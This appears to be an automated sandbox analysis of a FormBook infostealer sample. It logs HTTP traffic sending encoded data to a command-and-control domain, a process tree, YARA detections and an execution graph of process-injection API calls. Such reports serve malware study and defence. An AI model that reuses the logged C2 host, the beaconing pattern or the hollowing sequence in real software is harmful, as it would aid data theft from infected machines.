                                                                                                              Data Raw: 36 6e 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 47 59 59 71 41 72 53 6f 67 37 52 35 74 4a 51 54 71 72 6a 38 6f 6a 48 78 52 36 43 4b 68 34 37 42 63 50 4d 68 69 51 4b 43 68 6a 59 66 6c 6f 39 64 41 44 78 47 2f 6d 4c 62 30 6c 54 63 50 33 74 65 30 54 75 6d 70 57 52 5a 42 4f 69 72 36 70 34 7a 61 4c 4b 76 35 6b 4c 68 4d 4d 48 70 6a 52 5a 67 2f 68 6c 5a 38 30 36 75 4a 44 35 59 45 56 77 6f 42 68 37 41 51 77 39 6b 63 4f 58 69 65 31 77 72 4c 35 6a 55 44 5a 65 73 75 56 4f 6f 39 72 4d 39 76 45 31 6b 7a 43 4b 6e 78 62 36 46 2b 48 48 41 46 79 52 63 44 68 58 62 67 3d 3d
                                                                                                              Data Ascii: 6n=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/GYYqArSog7R5tJQTqrj8ojHxR6CKh47BcPMhiQKChjYflo9dADxG/mLb0lTcP3te0TumpWRZBOir6p4zaLKv5kLhMMHpjRZg/hlZ806uJD5YEVwoBh7AQw9kcOXie1wrL5jUDZesuVOo9rM9vE1kzCKnxb6F+HHAFyRcDhXbg==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              43192.168.2.1051570188.114.97.3806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:36.788934946 CET1787OUTPOST /swhs/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.zkdamdjj.shop
                                                                                                              Origin: http://www.zkdamdjj.shop
                                                                                                              Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 41 41 59 71 78 4c 53 70 44 44 52 34 74 4a 51 4d 61 72 69 38 6f 6a 61 78 52 53 47 4b 68 39 4d 42 65 48 4d 68 41 59 4b 4c 31 33 59 49 31 6f 39 56 67 44 79 59 50 6e 52 62 30 56 58 63 50 6e 74 65 30 54 75 6d 71 4f 52 64 51 4f 69 74 36 70 35 77 61 4c 47 72 35 6b 76 68 4e 6c 38 70 6a 56 6a 67 4d 5a 6c 63 73 6b 36 69 62 72 35 46 30 56 79 72 42 68 6a 41 51 74 6a 6b 64 6a 6b 69 66 42 57 72 49 70 6a 51 69 6b 65 75 65 42 75 71 2f 48 4c 39 63 42 4c 73 44 57 2f 6c 6c 76 79 47 62 62 5a 63 6e 54 68 56 33 38 76 5a 70 56 38 39 6a 48 46 63 74 52 55 6f 6b 4c 6f 51 77 43 6c 6e 32 4a 76 4f 65 48 49 67 6e 55 50 67 63 44 63 4c 78 47 76 32 49 39 45 79 32 56 61 49 74 69 59 68 31 66 76 4f 41 55 65 49 57 6f 48 5a 54 45 4d 4b 5a 46 34 77 62 45 44 4d 2f 37 7a 46 71 4d 43 4b 44 72 48 72 70 37 6c 4a 74 6f 35 33 59 36 39 6f 56 67 2b 74 2b 68 51 71 4c 50 57 31 75 70 75 32 76 50 32 55 2b 4a 74 58 56 51 [TRUNCATED]
                                                                                                              Data Ascii: 6n=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/AAYqxLSpDDR4tJQMari8ojaxRSGKh9MBeHMhAYKL13YI1o9VgDyYPnRb0VXcPnte0TumqORdQOit6p5waLGr5kvhNl8pjVjgMZlcsk6ibr5F0VyrBhjAQtjkdjkifBWrIpjQikeueBuq/HL9cBLsDW/llvyGbbZcnThV38vZpV89jHFctRUokLoQwCln2JvOeHIgnUPgcDcLxGv2I9Ey2VaItiYh1fvOAUeIWoHZTEMKZF4wbEDM/7zFqMCKDrHrp7lJto53Y69oVg+t+hQqLPW1upu2vP2U+JtXVQv6UqoEghRlfUuo7n9v6eQQwKaIhFrFCEFbqwY0RptFWhGJAg8fuli+cL09MYJ1MgxVzAGhfTBNHLJYe0sl2yIKBVzqTH2OF+pFPqfWcIwUPJqu0e17VBiT1IwicGIjJN/6/uOXBbuoZXRPLjPBZtMK9k/JFt/iVXy+F694Jlq6g9RnOWcAsV2AkrcpQOEwozrsC1eY5e8k8PY4wu4FHP/kDt5OuU7DUrfdJ18+y2K05WwS3NO8S46aXjGY8/Fgl3Av1c0iFf4ruksmvq4HvFgVOJCfvpFviMfh8Vv0RLOrwou7OBTzcxbSRWAOfp3gUCXOtzlbPS0zcmzr3FQKTCPDmxI3Bg98TSc7SgJwsqyGkMtgBfoQnltNLJlT7BX+FFpSW/LJT9gXZtT9VZKI4PB81zkm3cR9PgAumGe42pvTPNvUBZ6Ar5w0MHeRYdev2ovNTD535rRlrPYBQazKDmWkY6i+2uQOkyEAa+jTn1E8+mHgC5emgRt20RF5llNIOSKgOQcodbFfEo79Td5A9TK/xmGZ6JU2oML9oLYG3xI8euYS0nwSoquqh97YLcV4QMV1Tx2GZKovu/1TA+5hQ9q7vbKR0+zX6uQcozSOTTg26GsHQVwniT70y99CpewEv/Leq1l0XG9qi/GbfJI6M0QNNeNTT6zJfggf [TRUNCATED]


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              44192.168.2.1051571188.114.97.3806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:39.330887079 CET488OUTGET /swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.zkdamdjj.shop
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:21:23:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\suBpo1g13Q.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\suBpo1g13Q.exe"
                                                                                                              Imagebase:0x730000
                                                                                                              File size:983'048 bytes
                                                                                                              MD5 hash:D8BA09DB25AFABBA3143CB47DD6B8F37
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:21:23:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\suBpo1g13Q.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Users\user\Desktop\suBpo1g13Q.exe"
                                                                                                              Imagebase:0x240000
                                                                                                              File size:983'048 bytes
                                                                                                              MD5 hash:D8BA09DB25AFABBA3143CB47DD6B8F37
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:21:23:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\suBpo1g13Q.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\suBpo1g13Q.exe"
                                                                                                              Imagebase:0x890000
                                                                                                              File size:983'048 bytes
                                                                                                              MD5 hash:D8BA09DB25AFABBA3143CB47DD6B8F37
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:21:24:10
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe"
                                                                                                              Imagebase:0x350000
                                                                                                              File size:140'800 bytes
                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:21:24:12
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                                              Imagebase:0xa20000
                                                                                                              File size:32'768 bytes
                                                                                                              MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:21:24:26
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe"
                                                                                                              Imagebase:0x350000
                                                                                                              File size:140'800 bytes
                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:21:24:39
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                              Imagebase:0x7ff613480000
                                                                                                              File size:676'768 bytes
                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.3%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:325
                                                                                                                Total number of Limit Nodes:25
                                                                                                                execution_graph 39670 71b1fd8 39674 71b2010 39670->39674 39679 71b2000 39670->39679 39671 71b1ff7 39675 71b2019 39674->39675 39684 71b2058 39675->39684 39693 71b204e 39675->39693 39676 71b203e 39676->39671 39680 71b200e 39679->39680 39682 71b2058 DrawTextExW 39680->39682 39683 71b204e DrawTextExW 39680->39683 39681 71b203e 39681->39671 39682->39681 39683->39681 39685 71b2093 39684->39685 39688 71b2082 39684->39688 39685->39688 39702 71b2409 39685->39702 39707 71b2380 39685->39707 39712 71b2370 39685->39712 39717 71bb600 39685->39717 39723 71bb610 39685->39723 39729 71b2481 39685->39729 39688->39676 39694 71b2093 39693->39694 39695 71b2082 39693->39695 39694->39695 39696 71b2409 DrawTextExW 39694->39696 39697 71b2481 DrawTextExW 39694->39697 39698 71bb610 DrawTextExW 39694->39698 39699 71bb600 DrawTextExW 39694->39699 39700 71b2370 DrawTextExW 39694->39700 39701 71b2380 DrawTextExW 39694->39701 39695->39676 39696->39695 39697->39695 39698->39695 39699->39695 39700->39695 39701->39695 39703 71b2410 39702->39703 39704 71b24ae 39703->39704 39734 71b2c10 39703->39734 39739 71b2c00 39703->39739 39704->39688 39708 71b23a8 39707->39708 39709 71b23ff 39708->39709 39710 71b2c10 DrawTextExW 39708->39710 39711 71b2c00 DrawTextExW 39708->39711 39709->39688 39710->39709 39711->39709 39713 71b2380 39712->39713 39714 71b23ff 39713->39714 39715 71b2c10 DrawTextExW 39713->39715 39716 71b2c00 DrawTextExW 39713->39716 39714->39688 39715->39714 39716->39714 39718 71bb66d 39717->39718 39720 71bb636 39717->39720 39721 71bb699 39718->39721 39797 71bb790 39718->39797 39719 71bb68f 39719->39688 39720->39688 39721->39688 39724 71bb66d 39723->39724 39726 71bb636 39723->39726 39727 71bb699 39724->39727 39728 71bb790 DrawTextExW 39724->39728 39725 71bb68f 39725->39688 39726->39688 39727->39688 39728->39725 39730 71b248d 39729->39730 39731 71b24ae 39730->39731 39732 71b2c10 DrawTextExW 39730->39732 39733 71b2c00 DrawTextExW 39730->39733 39731->39688 39732->39731 39733->39731 39735 71b2c26 39734->39735 39744 71b3078 39735->39744 39748 71b3068 39735->39748 39736 71b2c9c 39736->39704 39740 71b2c10 39739->39740 39742 71b3078 DrawTextExW 39740->39742 39743 71b3068 DrawTextExW 39740->39743 39741 71b2c9c 39741->39704 39742->39741 39743->39741 39753 71b30b8 39744->39753 39758 71b30a8 39744->39758 39745 71b3096 39745->39736 39749 71b3078 39748->39749 39751 71b30b8 DrawTextExW 39749->39751 39752 71b30a8 DrawTextExW 39749->39752 39750 71b3096 39750->39736 39751->39750 39752->39750 39754 71b30e9 39753->39754 39755 71b3116 39754->39755 39763 71b3129 39754->39763 39768 71b3138 39754->39768 39755->39745 39759 71b30e9 39758->39759 39760 71b3116 39759->39760 39761 71b3129 DrawTextExW 39759->39761 39762 71b3138 DrawTextExW 39759->39762 39760->39745 39761->39760 39762->39760 39765 71b3138 39763->39765 39764 71b316e 39764->39755 39765->39764 39773 71b12e8 39765->39773 39767 71b31d9 39770 71b3159 39768->39770 39769 71b316e 39769->39755 39770->39769 39771 71b12e8 DrawTextExW 39770->39771 39772 71b31d9 39771->39772 39775 71b12f3 39773->39775 39774 71b51a9 39774->39767 39775->39774 39780 71b5cc1 39775->39780 39785 71b5d20 39775->39785 39789 71b5d10 39775->39789 39776 71b52bc 39776->39767 39781 71b5ccf 39780->39781 39782 71b5d30 39780->39782 39781->39776 39793 71b47bc 39782->39793 39786 71b5d30 39785->39786 39787 71b47bc DrawTextExW 39786->39787 39788 71b5d3d 39787->39788 39788->39776 39790 71b5d30 39789->39790 39791 71b47bc DrawTextExW 39790->39791 39792 71b5d3d 39791->39792 39792->39776 39794 71b5d58 DrawTextExW 39793->39794 39796 71b5d3d 39794->39796 39796->39776 39798 71bb7c4 39797->39798 39802 71bbd69 39798->39802 39808 71bbd70 39798->39808 39799 71bb7e0 39799->39719 39803 71bbd70 39802->39803 39804 71bbdb9 39803->39804 39814 71bf681 39803->39814 39819 71bf690 39803->39819 39804->39799 39805 71bbe76 39809 71bbd95 39808->39809 39810 71bbdb9 39809->39810 39812 71bf681 DrawTextExW 39809->39812 39813 71bf690 DrawTextExW 39809->39813 39810->39799 39811 71bbe76 39812->39811 39813->39811 39815 71bf68a 39814->39815 39816 71bf8a0 39815->39816 39824 71bfbf2 39815->39824 39828 71bfc00 39815->39828 39816->39805 39820 71bf6d0 39819->39820 39821 71bf8a0 39820->39821 39822 71bfbf2 DrawTextExW 39820->39822 39823 71bfc00 DrawTextExW 39820->39823 39821->39805 39822->39821 39823->39821 39827 71bfc30 39824->39827 39825 71bfd7f 39825->39816 39826 71b3138 DrawTextExW 39826->39825 39827->39825 39827->39826 39831 71bfc30 39828->39831 39829 71bfd7f 39829->39816 39830 71b3138 DrawTextExW 39830->39829 39831->39829 39831->39830 39834 71bb408 39836 71bb427 39834->39836 39835 71bb5ad 39836->39835 39839 71bb5b8 39836->39839 39843 71bb5c8 39836->39843 39840 71bb5d1 39839->39840 39841 71b2058 DrawTextExW 39840->39841 39842 71bb5f5 39841->39842 39842->39836 39844 71bb5d1 39843->39844 39845 71b2058 DrawTextExW 39844->39845 39846 71bb5f5 39845->39846 39846->39836 39832 296d810 DuplicateHandle 39833 296d8a6 39832->39833 40022 296ae30 40023 296ae3f 40022->40023 40025 296af19 40022->40025 40026 296af5c 40025->40026 40027 296af39 40025->40027 40026->40023 40027->40026 40028 296b160 GetModuleHandleW 40027->40028 40029 296b18d 40028->40029 40029->40023 40030 71b0de0 40031 71b0df5 40030->40031 40033 71b0eb0 40031->40033 40035 71b1388 40031->40035 40032 71b0e85 40036 71b13bc 40035->40036 40040 71b138b 40035->40040 40036->40032 40037 71b1673 40037->40032 40038 71b14f8 40038->40037 40051 71b16d3 GetCurrentThreadId 40038->40051 40040->40036 40040->40038 40043 71b18d0 40040->40043 40047 71b18c0 40040->40047 40044 71b18f1 40043->40044 40045 71b1973 40044->40045 40052 71b1f49 40044->40052 40045->40038 40049 71b18f1 40047->40049 40048 71b1973 40048->40038 40049->40048 40050 71b1f49 DrawTextExW 40049->40050 40050->40048 40051->40038 40053 71b2481 DrawTextExW 40052->40053 40054 71b1f4e 40053->40054 40054->40045 40055 72405d8 40056 7240763 40055->40056 40057 72405fe 40055->40057 40057->40056 40059 72400b8 40057->40059 40060 7240858 PostMessageW 40059->40060 40061 72408c4 40060->40061 40061->40057 39847 71de280 39848 71de18b 39847->39848 39849 71de174 39848->39849 39853 71dec7e 39848->39853 39870 71dec08 39848->39870 39886 71dec18 39848->39886 39854 71dec0c 39853->39854 39856 71dec81 39853->39856 39855 71dec3a 39854->39855 39902 71df15f 39854->39902 39906 71df882 39854->39906 39910 71df423 39854->39910 39914 71df4a6 39854->39914 39919 71df2e5 39854->39919 39924 71df4c5 39854->39924 39928 71df3ea 39854->39928 39935 71df32b 39854->39935 39940 71df0e8 39854->39940 39944 71df02f 39854->39944 39949 71df8f0 39854->39949 39954 71df456 39854->39954 39959 71df574 39854->39959 39855->39849 39856->39849 39871 71dec0c 39870->39871 39872 71dec3a 39871->39872 39873 71df15f 2 API calls 39871->39873 39874 71df574 2 API calls 39871->39874 39875 71df456 2 API calls 39871->39875 39876 71df8f0 2 API calls 39871->39876 39877 71df02f 2 API calls 39871->39877 39878 71df0e8 2 API calls 39871->39878 39879 71df32b 2 API calls 39871->39879 39880 71df3ea 4 API calls 39871->39880 39881 71df4c5 2 API calls 39871->39881 39882 71df2e5 2 API calls 39871->39882 39883 71df4a6 2 API calls 39871->39883 39884 71df423 2 API calls 39871->39884 39885 71df882 2 API calls 39871->39885 39872->39849 39873->39872 39874->39872 39875->39872 39876->39872 39877->39872 39878->39872 39879->39872 39880->39872 39881->39872 39882->39872 39883->39872 39884->39872 39885->39872 39887 71dec32 39886->39887 39888 71dec3a 39887->39888 39889 71df15f 2 API calls 39887->39889 39890 71df574 2 API calls 39887->39890 39891 71df456 2 API calls 39887->39891 39892 71df8f0 2 API calls 39887->39892 39893 71df02f 2 API calls 39887->39893 39894 71df0e8 2 API calls 39887->39894 39895 71df32b 2 API calls 39887->39895 39896 71df3ea 4 API calls 39887->39896 39897 71df4c5 2 API calls 39887->39897 39898 71df2e5 2 API calls 39887->39898 39899 71df4a6 2 API calls 39887->39899 39900 71df423 2 API calls 39887->39900 39901 71df882 2 API calls 39887->39901 39888->39849 39889->39888 39890->39888 39891->39888 39892->39888 39893->39888 39894->39888 39895->39888 39896->39888 39897->39888 39898->39888 39899->39888 39900->39888 39901->39888 39964 71ddbb8 39902->39964 39968 71ddbc0 39902->39968 39903 71df181 39903->39855 39972 71dd938 39906->39972 39976 71dd931 39906->39976 39907 71df89c 39980 71dda08 39910->39980 39984 71dda10 39910->39984 39911 71df441 39911->39855 39915 71df4ac 39914->39915 39988 71dd449 39915->39988 39992 71dd450 39915->39992 39916 71df646 39920 71df2e8 39919->39920 39996 71ddac8 39920->39996 40000 71ddad0 39920->40000 39921 71df30c 39926 71ddac8 WriteProcessMemory 39924->39926 39927 71ddad0 WriteProcessMemory 39924->39927 39925 71df147 39926->39925 39927->39925 39931 71dd938 Wow64SetThreadContext 39928->39931 39932 71dd931 Wow64SetThreadContext 39928->39932 39929 71df404 39929->39855 39933 71dd449 ResumeThread 39929->39933 39934 71dd450 ResumeThread 39929->39934 39930 71df646 39931->39929 39932->39929 39933->39930 39934->39930 39936 71df2e8 39935->39936 39938 71ddac8 WriteProcessMemory 39936->39938 39939 71ddad0 WriteProcessMemory 39936->39939 39937 71df30c 39938->39937 39939->39937 39941 71df11f 39940->39941 40004 71ddd4c 39940->40004 40008 71ddd58 39940->40008 39941->39855 39945 71df03c 39944->39945 39947 71ddd4c CreateProcessA 39945->39947 39948 71ddd58 CreateProcessA 39945->39948 39946 71df11f 39946->39855 39947->39946 39948->39946 39950 71df881 39949->39950 39952 71dd938 Wow64SetThreadContext 39950->39952 39953 71dd931 Wow64SetThreadContext 39950->39953 39951 71df89c 39952->39951 39953->39951 39955 71df463 39954->39955 39957 71dd449 ResumeThread 39955->39957 39958 71dd450 ResumeThread 39955->39958 39956 71df646 39957->39956 39958->39956 39960 71df57a 39959->39960 39962 71ddac8 WriteProcessMemory 39960->39962 39963 71ddad0 WriteProcessMemory 39960->39963 39961 71df7c8 39962->39961 39963->39961 39965 71ddbc0 ReadProcessMemory 39964->39965 39967 71ddc4f 39965->39967 39967->39903 39969 71ddc0b ReadProcessMemory 39968->39969 39971 71ddc4f 39969->39971 39971->39903 39973 71dd97d Wow64SetThreadContext 39972->39973 39975 71dd9c5 39973->39975 39975->39907 39977 71dd936 Wow64SetThreadContext 39976->39977 39979 71dd9c5 39977->39979 39979->39907 39981 71dda10 VirtualAllocEx 39980->39981 39983 71dda8d 39981->39983 39983->39911 39985 71dda50 VirtualAllocEx 39984->39985 39987 71dda8d 39985->39987 39987->39911 39989 71dd450 ResumeThread 39988->39989 39991 71dd4c1 39989->39991 39991->39916 39993 71dd490 ResumeThread 39992->39993 39995 71dd4c1 39993->39995 39995->39916 39997 71ddad0 WriteProcessMemory 39996->39997 39999 71ddb6f 39997->39999 39999->39921 40001 71ddb18 WriteProcessMemory 40000->40001 40003 71ddb6f 40001->40003 40003->39921 40005 71ddd58 CreateProcessA 40004->40005 40007 71ddfa3 40005->40007 40009 71ddde1 CreateProcessA 40008->40009 40011 71ddfa3 40009->40011 40012 296d5c8 40013 296d60e GetCurrentProcess 40012->40013 40015 296d660 GetCurrentThread 40013->40015 40016 296d659 40013->40016 40017 296d696 40015->40017 40018 296d69d GetCurrentProcess 40015->40018 40016->40015 40017->40018 40019 296d6d3 40018->40019 40020 296d6fb GetCurrentThreadId 40019->40020 40021 296d72c 40020->40021 40062 2964668 40063 296467a 40062->40063 40064 2964686 40063->40064 40066 2964779 40063->40066 40067 296479d 40066->40067 40071 2964888 40067->40071 40075 2964878 40067->40075 40073 29648af 40071->40073 40072 296498c 40072->40072 40073->40072 40079 296449c 40073->40079 40077 2964888 40075->40077 40076 296498c 40076->40076 40077->40076 40078 296449c CreateActCtxA 40077->40078 40078->40076 40080 2965918 CreateActCtxA 40079->40080 40082 29659cf 40080->40082

                                                                                                                Executed Functions

                                                                                                                Function 0296D5B9 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0296D646
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0296D683
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0296D6C0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0296D719
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 96d9546ceb18f8c6916947157ee3bf19dccda6664907c01abd8dcbd31fa23ac7
                                                                                                                • Instruction ID: 02edfa8718ff373d910c3dc549d35fa7641e213e39541c47ad19a426803c2c8e
                                                                                                                • Opcode Fuzzy Hash: 96d9546ceb18f8c6916947157ee3bf19dccda6664907c01abd8dcbd31fa23ac7
                                                                                                                • Instruction Fuzzy Hash: 2C5198B0A013098FEB14CFAAD549BAEBBF5FF48304F248459E019A7360DB745945CF65
                                                                                                                Function 0296D5C8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0296D646
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0296D683
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0296D6C0
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0296D719
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1356396868.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2960000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 5f5f94dd7c5d8c9040f30919e846c0896ff56dc0dd85608be5826412343a31fb
                                                                                                                • Instruction ID: 2125b20c4cfa0d5cbd777cb330810629ed55f637125f5bc0e50767eb04ce6ed0
                                                                                                                • Opcode Fuzzy Hash: 5f5f94dd7c5d8c9040f30919e846c0896ff56dc0dd85608be5826412343a31fb
                                                                                                                • Instruction Fuzzy Hash: AF5187B0A013098FEB14CFAAD548BAEBBF5FF48304F248459E019A7360DB755945CF65
                                                                                                                Function 071DDD4C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
